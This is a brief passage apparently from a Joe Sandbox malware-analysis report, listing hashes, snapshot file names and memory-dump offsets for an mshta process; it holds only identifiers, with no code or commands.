                                  • Snapshot File: hcaresult_5_2_1b27fe10000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction ID: ed4aa8d6e4a9b85291d3a409de7f07b8169b8528aeb3b09569ab491c4b606548
                                  • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction Fuzzy Hash: CC90021449D44656D41821920C4669C7040639C290FE44490951690144DA5D029B5256
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3611401575.000001B27FE10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001B27FE10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1b27fe10000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction ID: ed4aa8d6e4a9b85291d3a409de7f07b8169b8528aeb3b09569ab491c4b606548
                                  • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction Fuzzy Hash: CC90021449D44656D41821920C4669C7040639C290FE44490951690144DA5D029B5256